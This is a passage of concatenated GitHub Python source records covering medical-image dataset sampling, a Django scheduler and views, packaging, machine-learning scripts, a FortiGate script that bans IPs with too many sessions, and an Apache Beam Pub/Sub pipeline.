torch.topk(count, 3, largest=False).indices\n if torch.sum(count) < domain_count:\n count[s1] += 1\n if torch.sum(count) < domain_count:\n count[s2] += 1\n if torch.sum(count) < domain_count:\n count[s3] += 1\n\n total_count = torch.sum(count)\n if total_count != domain_count:\n raise ValueError(f\"Incorrect total count: {total_count} != {domain_count}\")\n\n count = count.reshape((2, 2))\n return count\n\n\n def sample(self, generator, datastore, labels, Y_col, Z_col, patient_col, mask, count, reservation):\n random_state = 0\n while True:\n in_sample = set()\n for Y in range(2):\n for Z in range(2):\n masked = labels.loc[mask & (labels[\"M\"] == 2 * Y + Z)]\n image_per_patient = masked.groupby(patient_col).size()\n weights = image_per_patient.loc[masked[patient_col]].values\n indices = masked.sample(int(count[Y, Z]), weights=weights, random_state=random_state)\n in_sample.update(indices.index)\n\n class_name = self.__class__.__name__\n if class_name == \"MultipleDomainCheXpert\":\n in_sample_patients = { fname.split(\"/\")[2] for fname in in_sample }\n elif class_name == \"MultipleDomainMIMIC\":\n subject_id = labels[\"subject_id\"]\n in_sample_patients = { subject_id.at[dicom_id].item() for dicom_id in in_sample }\n else:\n raise NotImplementedError(f\"Unknown dataset {class_name}\")\n\n remainder = np.bincount(labels[\"M\"], weights=mask & ~labels[patient_col].isin(in_sample_patients))\n if reservation is None or np.all(remainder >= reservation):\n print(f\" remainder = {remainder} >= {reservation} = target_domain_count\")\n break\n\n random_state += 1\n print(f\" remainder = {remainder} < {reservation} = target_domain_count\")\n\n N = int(torch.sum(count))\n assert len(in_sample) == N, f\"Incorrect number of elements: {len(in_sample)} != {N}\"\n\n x = torch.empty((N, *self.input_shape[1:]))\n y_tilde = torch.empty(N, dtype=torch.long)\n y = torch.empty(N, dtype=torch.long)\n z_flattened = torch.empty(N, dtype=torch.long)\n\n perm = torch.randperm(N, generator=generator)\n for i, key in enumerate(in_sample):\n x[perm[i]] = torch.Tensor(datastore[key])\n row = labels.loc[key]\n y[perm[i]] = y_tilde[perm[i]] = row[Y_col]\n z_flattened[perm[i]] = row[Z_col]\n\n return TensorDataset(x, y_tilde, y, z_flattened), in_sample_patients\n","repo_name":"nalzok/test-time-label-shift","sub_path":"tta/datasets/cxr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7059,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"55"} +{"seq_id":"39628704742","text":"from datetime import datetime\nfrom logging import getLogger\nfrom time import sleep\n\nfrom croniter import croniter\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom hexa.pipelines.models import Pipeline, PipelineRunTrigger\n\nlogger = getLogger(__name__)\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n # only run by sequence of 5min\n cutoff = 5 * 60\n\n while True:\n sequence, start_time = [], timezone.now()\n for pipeline in Pipeline.objects.exclude(schedule=None):\n if not croniter.is_valid(pipeline.schedule):\n logger.warning(\"pipeline %s invalid schedule\", pipeline.id)\n continue\n\n if pipeline.last_run:\n last_exec = pipeline.last_run.execution_date\n else:\n last_exec = timezone.now()\n\n cron = croniter(pipeline.schedule, last_exec)\n next_exec_time = cron.get_next(datetime)\n next_exec_delay = (next_exec_time - start_time).total_seconds()\n if next_exec_delay < cutoff:\n sequence.append((pipeline, next_exec_delay, next_exec_time))\n\n logger.debug(\"exec seq %s\", sequence)\n for pipeline, delay, exec_time in sorted(sequence, key=lambda e: e[1]):\n # to have a good quality sequence, correct the next delay with an\n # offset based on the diff between NOW and START\n real_delay = delay - (timezone.now() - start_time).total_seconds()\n if real_delay > 0:\n logger.debug(f\"sleep before run: {real_delay}\")\n sleep(real_delay)\n\n pipeline.run(\n user=None,\n pipeline_version=pipeline.last_version,\n trigger_mode=PipelineRunTrigger.SCHEDULED,\n send_mail_notifications=pipeline.recipients.count() > 0,\n )\n\n empty_delay = cutoff - (timezone.now() - start_time).total_seconds()\n if empty_delay > 0:\n logger.debug(\"sleep end runs: %s\", empty_delay)\n sleep(empty_delay)\n","repo_name":"BLSQ/openhexa-app","sub_path":"hexa/pipelines/management/commands/pipelines_scheduler.py","file_name":"pipelines_scheduler.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"55"} +{"seq_id":"15747788643","text":"#!/usr/bin/env python3\nimport subprocess\nimport os\nimport re\nfrom configparser import ConfigParser\nfrom distutils.command.install import install\nfrom distutils.core import setup\n\ndirname = os.path.dirname(__file__)\nif dirname != '':\n os.chdir(os.path.dirname(__file__))\n\nconfig = ConfigParser()\nconfig.read('etc/myougiden/config.ini')\nversion = config.get('core', 'version')\n\ndef md_to_rest(f):\n '''Very hacky.'''\n\n s = ''\n for line in f:\n line = re.sub(r'!\\[[^]]*\\]\\((.*)\\)', r'\\1', line)\n s += line\n\n s = s.replace(\":\\n\\n\", \"::\\n\\n\")\n return s\n\nwith open('README.md', 'r') as f:\n longdesc=md_to_rest(f)\n\nsetup(name='myougiden',\n version=version,\n description='Japanese/English command-line dictionary',\n long_description=longdesc,\n author='Melissa Boiko',\n author_email='melissa@namakajiri.net',\n url='https://github.com/melissaboiko/myougiden',\n packages=['myougiden'],\n scripts=['bin/myougiden', 'bin/updatedb-myougiden'],\n data_files=[('etc/myougiden/', ['etc/myougiden/config.ini'])],\n license='GPLv3',\n install_requires=[\n 'romkan',\n 'termcolor',\n ],\n python_requires='>=3',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Education',\n 'Intended Audience :: End Users/Desktop',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Natural Language :: English',\n 'Natural Language :: Japanese',\n 'Operating System :: POSIX',\n 'Programming Language :: Python :: 3',\n 'Topic :: Education',\n 'Topic :: Text Processing :: Linguistic',\n ]\n )\n\n","repo_name":"melissaboiko/myougiden","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"55"} +{"seq_id":"36035803678","text":"# -*- coding: utf-8 -*-\n\nfrom tinydb import TinyDB, where, Query\n\ndef createStudyTable():\n db = TinyDB('database/db.json')\n tableStudy = db.table('Study')\n\n tableStudy.insert({'patName': 'Hasta adı', 'patID': '3333', 'patSex':'Cinsiyet', 'patAge':'Yaş',\n 'patBirthdate':'Doğum Tarihi', 'procedure':'Protokol', 'examDate':'Çekim Tarihi', 'origFile':'',\n 'importDatetime':'Yakalama zamanı', 'studyID':'tetkikNo', 'fileSHA':'1234567890', 'modality':'OT',\n 'operatorName':'Teknisyen', 'refPhys':'Gönderen Doktor', 'importTime':'11/04/2016 11:21:00',\n 'sentToPacs':'False', 'senTime':'', 'retries':'0'})\n db.close()\n\ndef exist(SHA):\n db = TinyDB('database/db.json')\n tableStudy = db.table('Study')\n study = Query()\n result = tableStudy.contains(study.fileSHA == SHA)\n db.close()\n return result\n\n\ndef testQuery():\n db = TinyDB('database/db.json')\n tableStudy = db.table('Study')\n study = Query()\n pat = tableStudy.search(study.fileSHA == '12345')\n res = pat[0]\n print(res['examDate'])\n db.close()\n\n\ncreateStudyTable()\n#print exist('123456789') db boşşa hata veriyor, yakala\n#testQuery()\n\n#createStudyTable()\n","repo_name":"ysdede/pdf2pacs","sub_path":"patDB.py","file_name":"patDB.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"tr","doc_type":"code","stars":4,"dataset":"github-code","pt":"55"} +{"seq_id":"18508503298","text":"T = int(input())\n\nfor test_case in range(1, T+1):\n chars = input()\n stack = ['']\n\n for i in range(len(chars)):\n # 반복된 문자열이면 넣지 않아\n if chars[i] == stack[-1]:\n stack.pop()\n else:\n stack.append(chars[i])\n\n print(f'#{test_case} {len(stack)-1}')\n\n","repo_name":"yuna872/Algorithm","sub_path":"SWEA/4873_반복문자지우기.py","file_name":"4873_반복문자지우기.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"4144839487","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 5 21:16:23 2019\n\n@author: Afei\n\"\"\"\nimport seaborn as sns\nimport pandas as pd\nimport numpy as np\nimport xlrd\nimport matplotlib.pyplot as plt\nfrom matplotlib.pylab import figure, plot, title, xlabel, ylabel, legend, ylim, show, boxplot\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, confusion_matrix,accuracy_score\nfrom sklearn import model_selection, tree\n# import warnings filter\nfrom warnings import simplefilter\n# ignore all future warnings\nsimplefilter(action='ignore', category=FutureWarning)\nfrom sklearn.preprocessing import StandardScaler \n \n#%% \n# ------------------------------data preparation-----------------------------\n# ---------------------------------------------------------------------------\n\n\n#import the data set\ndoc = xlrd.open_workbook('C:/Users/A_FEI/Documents/GitHub/ML-DM/HeartDesease/heart.xls').sheet_by_index(0)\nattributeNames = doc.row_values(0, 0, 14)\n\n#import the data to X_og matrix\n#all data\nX_og = np.empty((303, 14))\nfor i, col_id in enumerate(range(0, 14)):\n X_og[:, i] = np.asarray(doc.col_values(col_id, 1, 304))\n\nM = len(attributeNames)\nX_index= np.arange(0,M-2)\nX = X_og[:,X_index]\ny = X_og[:,M-1]\n\nX=X[:,[1,2,7,8,9,11]]\n\n#%%\n# ----------------------------Classification Tree----------------------------\n#----------------------------------------------------------------------------\n# Tree complexity parameter - constraint on maximum depth\ntc = np.arange(2, 21, 1)\n\n#standradization\nX = StandardScaler().fit_transform(X)\n\n# K-fold crossvalidation\nK = 10 \nCV = model_selection.KFold(n_splits=K,random_state=42,shuffle=True)\n\n# Initialize variable\nError_train = np.empty((len(tc),K))\nError_test = np.empty((len(tc),K))\n\nk=0\nfor train_index, test_index in CV.split(X):\n print('Computing CV fold: {0}/{1}..'.format(k+1,K))\n\n # extract training and test set for current CV fold\n X_train, y_train = X[train_index,:], y[train_index]\n X_test, y_test = X[test_index,:], y[test_index]\n\n for i, t in enumerate(tc):\n # Fit decision tree classifier, Gini split criterion, different pruning levels\n dtc = tree.DecisionTreeClassifier(criterion='entropy', max_depth=t)\n dtc = dtc.fit(X_train,y_train.ravel())\n y_est_test = dtc.predict(X_test)\n y_est_train = dtc.predict(X_train)\n # Evaluate misclassification rate over train/test data (in this CV fold)\n misclass_rate_test = np.sum(y_est_test != y_test) / float(len(y_est_test))\n misclass_rate_train = np.sum(y_est_train != y_train) / float(len(y_est_train))\n Error_test[i,k], Error_train[i,k] = misclass_rate_test, misclass_rate_train\n\n k+=1\n\n \nmin_error = np.min(Error_test.mean(1))\nopt_idx = np.argmin(Error_test.mean(1))\nopt = opt_idx+2\n\nf = figure()\nboxplot(Error_test.T)\nxlabel('Model complexity (max tree depth)')\nylabel('Test error across CV folds, K={0})'.format(K))\n\nf = figure()\nplt.title(\"Test Error with different tree depth\")\nplot(tc, Error_train.mean(1))\nplot(opt, min_error, 'o')\nplot(tc, Error_test.mean(1))\nxlabel('Model complexity (max tree depth)')\nylabel('Error (misclassification rate, CV K={0})'.format(K))\nlegend(['Error_train','Error_test'])\n \nshow()\nfigure()\ncm_lr = confusion_matrix(y_test,y_est_test)\nplt.title(\"Decision Tree Confusion Matrix\")\nsns.heatmap(cm_lr,annot=True,cmap=\"Blues\",fmt=\"d\",cbar=False)\nprint(classification_report(y_test,y_est_test))\n","repo_name":"LF-Lin/MachineLearning-DataMining-DTU-course-practice-project-","sub_path":"HeartDesease/Project 2/upload/Project2_Code/Classification-DecisionTree.py","file_name":"Classification-DecisionTree.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"42289531688","text":"def daily(context: CallbackContext):\r\n message = \"Hello, this message will be sent only once\"\r\n with Session() as session:\r\n for user in session.query(User).filter(User.show_notifications == True):\r\n context.bot.send_message(chat_id=user.telegram_id, text=message)\r\n\r\n\r\n\r\n\r\nj = updater.job_queue\r\nj.run.once(once,10)\r\n\r\njob_daily = j.run_daily(daily, days=tuple(rang(7)))","repo_name":"Nastvick/Homework3","sub_path":"lecture_16/oldmain.py","file_name":"oldmain.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"13701021385","text":"import numpy as np\nimport time\nfrom functools import partial\nimport heapq\nfrom collections import Counter\nimport multiprocessing as mp\nfrom operator import itemgetter\nfrom math import ceil\nfrom random import shuffle\n\nfrom markov_model_priors import generate_priors, generate_transition_matrix\nfrom cspa_clustering import get_clustering\n\n\ndef path_generator(day_paths):\n for path in day_paths:\n if len(path) >= 3:\n for i in range(len(path) - 2):\n two_prior, prior, nxt = path[i:i+3]\n o1, o2 = tuple([prior]), tuple([two_prior, prior])\n yield o1, o2, prior, nxt\n\n\ndef get_xy(paths, tower_pos, o1_tt_pos, o2_tt_pos, o1_curr_mat, o2_curr_mat, le_curr_mat, co_curr_mat):\n for o1, o2, curr, nxt in path_generator(paths):\n o1_prior = o1_curr_mat[o1_tt_pos[o1]]\n o2_prior = o2_curr_mat[o2_tt_pos[o2]]\n\n le_prior = le_curr_mat[tower_pos[curr]]\n co_prior = co_curr_mat[tower_pos[curr]]\n\n info_row = np.concatenate((o1_prior, o2_prior, le_prior, co_prior))\n yield info_row, nxt\n\n\ndef splitter_generator(test_paths, split_size):\n curr_pos, total = 0, len(test_paths)\n while curr_pos + split_size < total:\n sidx = curr_pos\n curr_pos += split_size\n yield test_paths[sidx:curr_pos]\n else:\n yield test_paths[curr_pos:]\n\n\n\ndef knn_worker(test_paths, ref_paths, generator_partial, k=30):\n test_generator = generator_partial(paths=test_paths)\n matches, total = 0, 0\n for curr_vec, nxt_stop in test_generator:\n ref_generator = generator_partial(ref_paths)\n ct, h = 0, list()\n for ref_row, ref_next in ref_generator:\n if ct > k:\n heapq.heappushpop(h, (-np.linalg.norm(ref_row - curr_vec), ref_next))\n else:\n heapq.heappush(h, (-np.linalg.norm(ref_row - curr_vec), ref_next))\n ct += 1\n if Counter((i[1] for i in h)).most_common(1)[0][0] == nxt_stop:\n matches += 1\n total += 1\n return matches, total\n\n\ndef do_logregress():\n cspa_towers, learned_clusts, consensus_clusts, combined_clusts = get_clustering()\n upaths, _, o1_priors_mats, markov_towers, o1_tower_tuples = generate_priors()\n o2_priors_mats, o2_tower_tuples = generate_transition_matrix(upaths, markov_towers, order=2)\n\n tower_pos = dict()\n for i, tow in enumerate(cspa_towers):\n tower_pos[tow] = i\n\n o1_tt_pos = dict()\n for i, ttup in enumerate(o1_tower_tuples):\n o1_tt_pos[ttup] = i\n\n o2_tt_pos = dict()\n for i, ttup in enumerate(o2_tower_tuples):\n o2_tt_pos[ttup] = i\n\n dlength = len(upaths[22])\n print(\"Need to test paths: \", len(upaths[22]))\n\n o1_curr_mat = o1_priors_mats[21]\n o2_curr_mat = o2_priors_mats[21]\n le_curr_mat = learned_clusts[21]\n co_curr_mat = consensus_clusts[21]\n\n paths = [path for day in range(2, 22) for path in upaths[day]]\n\n info_gen_part = partial(get_xy, tower_pos=tower_pos, o1_tt_pos=o1_tt_pos, o2_tt_pos=o2_tt_pos,\n o1_curr_mat=o1_curr_mat, o2_curr_mat=o2_curr_mat, le_curr_mat=le_curr_mat,\n co_curr_mat =co_curr_mat)\n\n p = mp.Pool(processes=6)\n chunks = ceil(dlength/6)*6\n knn_partial = partial(knn_worker, ref_paths=paths, generator_partial=info_gen_part, k=30)\n print(\"Starting call to knn worker\")\n istart = time.time()\n #knn_partial(upaths[22])\n results = [p.apply_async(knn_partial, args=(ipath,)) for ipath in splitter_generator(upaths[22][:140], 25)]\n matched = [r.get() for r in results]\n mtch, total = sum(i[0] for i in matched), sum(i[1] for i in matched)\n print(\"Accuracy was: \", mtch/total, total)\n print(\"Completed working for one, time: \", time.time()-istart)\n\n\nif __name__ == \"__main__\":\n do_logregress()\n\n\n","repo_name":"jmcunnin/uap_andorra","sub_path":"scripts/log_classification.py","file_name":"log_classification.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"69919307360","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Opportunity, Element, Response, Application, Member\nfrom .models import Requirement, ApplicationStatus, GenericSkill, RequiredSkill\nfrom .models import LinkedSkill, OpenRecommendation, SkillRecommendation\nfrom .models import Tag, File\n\n\n# Create your views here.\n\ndef index(request):\n\n context = {}\n\n opportunities = Opportunity.objects.all()\n\n context['opportunities'] = opportunities\n\n return render(request, 'opportunities/index.html', context)\n\n\ndef view_opportunity(request, opportunity_slug):\n\n context = {}\n\n opportunity = Opportunity.objects.get(\n slug=opportunity_slug\n )\n\n requirements = Requirement.objects.filter(\n opportunity=opportunity)\n\n applications = Application.objects.filter(\n opportunity=opportunity\n )\n\n required_skills = RequiredSkill.objects.filter(\n opportunity=opportunity\n )\n\n context['opportunity'] = opportunity\n context['requirements'] = requirements\n context['applications'] = applications\n context['required_skills'] = required_skills\n\n return render(request, 'opportunities/view_opportunity.html', context)\n\n\ndef review_applicants(request, opportunity_slug):\n\n context = {}\n\n opportunity = Opportunity.objects.get(\n slug=opportunity_slug\n )\n\n requirements = Requirement.objects.filter(\n opportunity=opportunity)\n\n applications = Application.objects.filter(\n opportunity=opportunity\n )\n\n required_skills = RequiredSkill.objects.filter(\n opportunity=opportunity\n )\n\n responses = Response.objects.filter(\n application__opportunity=opportunity\n )\n\n context['opportunity'] = opportunity\n context['requirements'] = requirements\n context['applications'] = applications\n context['required_skills'] = required_skills\n context['responses'] = responses\n\n return render(request, 'opportunities/review_applicants.html', context)\n\n\n\ndef view_member(request, member_slug):\n\n context = {}\n\n member = Member.objects.get(\n slug=member_slug\n )\n\n skill_links = LinkedSkill.objects.filter(\n member=member)\n\n applications = Application.objects.filter(\n applicant=member\n )\n\n context['member'] = member\n context['skill_links'] = skill_links\n context['applications'] = applications\n\n return render(request, 'opportunities/view_member.html', context)\n\n\ndef view_application(request, application_slug):\n\n context = {}\n\n application = Application.objects.get(\n slug=application_slug\n )\n\n status = ApplicationStatus.objects.get(\n application=application)\n\n requirements = Requirement.objects.filter(\n opportunity=application.opportunity\n )\n\n responses = Response.objects.filter(\n application=application\n )\n\n context['application'] = application\n context['status'] = status\n context['requirements'] = requirements\n context['responses'] = responses\n\n return render(request, 'opportunities/view_application.html', context)\n","repo_name":"ToferC/careers","sub_path":"opportunities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35148256813","text":"import sqlite3\nimport os\n\nconn = sqlite3.connect('employees.sqlite')\ncursor = conn.cursor()\ncursor.execute('SELECT id, LastName, FirstName from zup_employees WHERE PHOTO IS NULL')\nresults = cursor.fetchall()\n\npresumedFileNameList = []\nfor el in results:\n presumedFileNameList.append(el[1] + ' ' + el[2])\n\nphoto_list = os.listdir(r'C:\\Users\\s41bl\\PycharmProjects\\project_birthday\\empl_photo')\nphoto_path = r'C:\\Users\\s41bl\\PycharmProjects\\project_birthday\\empl_photo\\\\'\nfile_names = [os.path.splitext(x)[0] for x in photo_list]\n\nfor photo in file_names:\n if photo.strip() in presumedFileNameList:\n photo_bytes = open(photo_path + photo + '.jpg', 'rb').read()\n cursor = conn.cursor()\n cursor.execute(\"UPDATE zup_employees SET PHOTO = ? WHERE FirstName = ? AND LastName = ?\",\n (photo_bytes, photo.split(\" \")[1], photo.split(\" \")[0]))\n conn.commit()\n\nconn.close()\n","repo_name":"s41blizzard/birthday_project","sub_path":"photo_uploader.py","file_name":"photo_uploader.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34470831417","text":"#!/usr/bin/env python\nimport requests\nfrom collections import Counter\nfrom datetime import datetime, timedelta\nfrom datetime import datetime\nimport numpy as np\nimport time\nimport os\nimport re\nimport ipaddress\nimport json\n\n# för att ta bort alla varningar för https\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n#https://github.com/fortinet-solutions-cse/fortiosapi/blob/master/fortiosapi/fortiosapi.py\n#https://www.used.net.ua/index.php/fajlovyj-arkhiv/category/35-fortinet.html?download=83:fortios-5-6-11-rest-api-reference\n# https://docs.fortinet.com/document/fortigate/7.0.0/new-features/270209/clear-multiple-sessions-with-rest-api-7-0-2\n\n\n#api_token = \n#VDOM = \n#\"VDOM = \"root\"\n\n#where the firewall information and token and vdom information is \nwith open('firewall_inventory.json', 'r') as f:\n FIREWALLSTOKEN = json.load(f)\n\n\n#how many sessions should be allowd before block\nnumber_of_sessions = 200\n#how long time should the block be active\nban_timer_sec = 1800\n#exclude list is what ips should not be blocked\nexclude_list = [\"10.0.0.0/8\", \"192.168.0.0/16\", \"172.16.0.0/12\"]\n\n\n\nheaders = {\n \"Authorization\": \"Bearer \" + FIREWALLSTOKEN['token']\n}\n\n\n\n# Get the current date and time\nnow = datetime.now()\n# Format the date and time string\nformatted_date = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n#print what have been put to Qurantine Monitor\ndef get_qurantine(FIREWALLSTOKEN):\n url = f\"https://{FIREWALLSTOKEN['name']}/api/v2/monitor/user/banned/select/?vdom={FIREWALLSTOKEN['vdom']}\"\n response = requests.get(url, headers=headers, verify=False)\n if response.status_code == 200:\n session_list = response.json()[\"results\"]\n #print (f'session_list: {session_list}')\n for i in session_list:\n print (f\"expires: {datetime.fromtimestamp(i['expires'])} created: {datetime.fromtimestamp(i['created'])} ip_address: {i['ip_address']} source: {i['source']} ipv6: {i['ipv6']}\")\n\ndef print_to_file_3_4(saddr_counter):\n with open('sessions_3_4_delar_av_max.txt', 'a') as file:\n # write a string to the file\n start = '*'*20+f'{formatted_date}'+'*'*20+f'\\n'\n file.write( start )\n for key, value in saddr_counter.items():\n if value > ((number_of_sessions/4)*3):\n #print (f\"if_saddr_counter: {value} - {key}\")\n file.write(f'{key}: {value}'+f'\\n')\n file.write('*'*30+f'\\n')\n\ndef print_to_file_banip_list(ban_list):\n with open('session_banip_list.txt', 'a') as file:\n # write a string to the file\n start = '*'*20+f'{formatted_date}'+'*'*20+f'\\n'\n file.write( start )\n for ban_ip in ban_list:\n #print (f\"if_saddr_counter: {value} - {key}\")\n file.write(f'{ban_ip}'+f'\\n')\n file.write('*'*30+f'\\n')\n\nwhile True:\n ban_list = []\n url = f\"https://{FIREWALLSTOKEN['name']}/api/v2/monitor/firewall/session?count=10000&filter-csf=false&ip_version=ipboth&start=0&summary=true&vdom={FIREWALLSTOKEN['vdom']}\"\n\n response = requests.get(url, headers=headers, verify=False)\n\n if response.status_code == 200:\n # Lista på alla sessions\n session_list = response.json()[\"results\"][\"details\"]\n # Använd Counter från collections modulen för att räkna upp antalet förekomster av varje saddr\n saddr_counter = Counter(session['saddr'] for session in session_list)\n\n #print to file, for all 3/4 of max\n print_to_file_3_4(saddr_counter)\n \n # Skapa en lista med bara de sessions som förekommer fler än 5 gånger\n common_sessions = [saddr for saddr, count in saddr_counter.items() if count >= number_of_sessions]\n # Skriv ut den nya listan\n\n for csessions in common_sessions:\n if not any(ipaddress.ip_address(csessions) in ipaddress.ip_network(exclude) for exclude in exclude_list):\n ban_list.append (csessions)\n\n #post \n #if there is multiple firewalls to block ips in, do this to a forloop, and comment out FIREWALLSTOKEN and uncomment firewall\n # for firewall in FIREWALLSTOKEN:\n firewall_name = FIREWALLSTOKEN['name']\n firewall_token = FIREWALLSTOKEN['token']\n firewall_vdom = FIREWALLSTOKEN['vdom']\n # firewall_name = firewall['name']\n # firewall_token = firewall['token']\n # firewall_vdom = firewall['vdom']\n #handele the api token\n headers = {\n \"Authorization\": \"Bearer \" + firewall_token\n }\n #url\n url = f\"https://{firewall_name}/api/v2/monitor/user/banned/add_users/?vdom={firewall_vdom}\"\n\n #payload for update, if new path to file\n payload = {'ip_addresses': ban_list,\"expiry\": ban_timer_sec}\n\n #connect and get the respondcode\n response = requests.post(url, headers=headers, json=payload, verify=False )\n\n #print all ban ip to file\n print_to_file_banip_list(ban_list)\n\n arr = np.array(ban_list)\n print(f'ban ip list count: {arr.size}')\n time.sleep(5) # Vänta 20 sekunder innan nästa anrop.\n \n #print all ips from the Quarantine Monitor\n get_qurantine(FIREWALLSTOKEN)\n \n\n else:\n if response.status_code == 403:\n print(\"some authentication missmatch for apia token, HTTP Code: \", response.status_code)\n elif response.status_code == 405:\n print(\"Method Not Allowed response status code indicates that the server knows the request method, HTTP Code: \", response.status_code)\n else:\n print(\"Some Error, HTTP Code: \", response.status_code)\n\n\n\n# Stäng","repo_name":"khol/fortigate_sessions_list","sub_path":"fortigate_get_sessions_tabel_banip.py","file_name":"fortigate_get_sessions_tabel_banip.py","file_ext":"py","file_size_in_byte":5439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22167279830","text":"import os\nimport pickle as pk\nimport time\nfrom collections import OrderedDict\n\nfrom torch.utils.tensorboard import SummaryWriter\n\n\nclass CLossLog(object):\n def __init__(self, paths, last_epoch):\n self.logs_path = paths.logs\n self.last_epoch = last_epoch\n self.meta_path = os.path.join(paths.nets, 'meta.pkl')\n self.writer = SummaryWriter(self.logs_path)\n self.meta_model = self.load()\n self.start_time = time.time()\n\n def add_value(self, epoch, name, val, new_epoch=False):\n if epoch not in self.meta_model.keys():\n self.meta_model[epoch] = dict()\n param_key = name.replace('/', '_')\n timestamp = time.time() - self.start_time\n self.meta_model[epoch].update({param_key: {'time': timestamp, 'val': val}})\n self.writer.add_scalar(param_key, val, epoch, walltime=None)\n self.writer.add_scalar(f'{param_key}_time', val, timestamp, walltime=None)\n self.writer.flush()\n\n def add_image(self, epoch, name, img):\n self.writer.add_image(name, img, global_step=epoch)\n self.writer.flush()\n\n def dump(self):\n with open(self.meta_path, \"wb\") as f:\n pk.dump(self.meta_model, f)\n\n def load(self):\n if self.last_epoch == -1:\n meta_model = OrderedDict()\n else:\n meta_model = self.get_meta()\n for epoch, dc in meta_model.items():\n for param_key, param_val in dc.items():\n self.writer.add_scalar(epoch, f'{param_key}_time', param_val['time'], walltime=None)\n self.writer.add_scalar(epoch, f'{param_key}', param_val['val'], walltime=None)\n self.writer.flush()\n return meta_model\n\n def get_meta(self):\n meta_model = pk.load(open(self.meta_path, \"rb\"))\n return meta_model\n","repo_name":"00itamarts00/FacialLandmarkDetectionDETR","sub_path":"common/losslog.py","file_name":"losslog.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40574527424","text":"import apache_beam as beam\nimport argparse\nimport json\nimport time\nimport traceback\nfrom apache_beam.io import ReadFromPubSub, WriteToPubSub\nfrom apache_beam.options.pipeline_options import PipelineOptions, SetupOptions, StandardOptions\nfrom apache_beam.transforms import window\nfrom google.cloud import logging\n\n\nLOG_NAME = \"horror_movie_dataset\"\n\ndef log_error(log, err_message):\n log.log_struct(\n {\n \"message\": err_message,\n \"error\": traceback.format_exc()\n },\n severity=\"ERROR\"\n )\n\n\nclass countDoFn(beam.DoFn):\n def process(self, element):\n try:\n return [('film_count', 1)] \n except:\n logging_client = logging.Client()\n logger = logging_client.logger(LOG_NAME)\n log_error(logger, \"Error occurred while counting number of Pub/Sub messages received in a window\")\n raise \n\n\ndef run(argv=None, save_main_session=True):\n logging_client = logging.Client()\n logger = logging_client.logger(LOG_NAME)\n\n try:\n # Code for parsing command line arguments was copied from https://github.com/apache/beam/blob/master/sdks/python/apache_beam/examples/streaming_wordcount.py\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--output_topic',\n required=True,\n help='PubSub output topic should have the form of projects//topics/')\n parser.add_argument(\n '--input_topic',\n required=True,\n help='PubSub input topic should have the form of projects//topics/')\n known_args, pipeline_args = parser.parse_known_args(argv)\n pipeline_options = PipelineOptions(pipeline_args)\n pipeline_options.view_as(SetupOptions).save_main_session = save_main_session\n pipeline_options.view_as(StandardOptions).streaming = True\n except:\n log_error(logger, \"Error occurred while parsing command line arguments\")\n raise\n\n logger.log_text(\"Commencing stream of horror movie data from one Pub/Sub topic to another Pub/Sub topic\", severity=\"INFO\")\n\n with beam.Pipeline(options=pipeline_options) as p:\n try:\n messages = (p | 'SubscribeToTopic' >> ReadFromPubSub(topic=known_args.input_topic).with_output_types(bytes))\n except:\n log_error(logger, \"Error occurred while reading pipeline input from Pub/Sub topic\")\n raise\n\n try:\n output = (\n messages\n | 'DecodeInput' >> beam.Map(lambda x: x.decode('utf-8'))\n | 'CountMovies' >> beam.ParDo(countDoFn())\n | 'CreateWindows' >> beam.WindowInto(window.FixedWindows(15, 0))\n | 'GroupByKey' >> beam.GroupByKey()\n | 'TotalMovies' >> beam.Map(lambda x: {x[0]: len(x[1]), 'timestamp': time.time()}) \n | 'MakeStrings' >> beam.Map(lambda x: json.dumps(x))\n | 'EncodeOutput' >> beam.Map(lambda x: x.encode('utf-8')).with_output_types(bytes)\n )\n except:\n log_error(logger, \"Error occurred while executing body of pipeline\")\n raise\n\n try:\n output | 'PublishToTopic' >> WriteToPubSub(known_args.output_topic)\n except:\n log_error(logger, \"Error occurred while writing pipeline output to Pub/Sub topic\")\n raise\n\n\nif __name__ == '__main__':\n 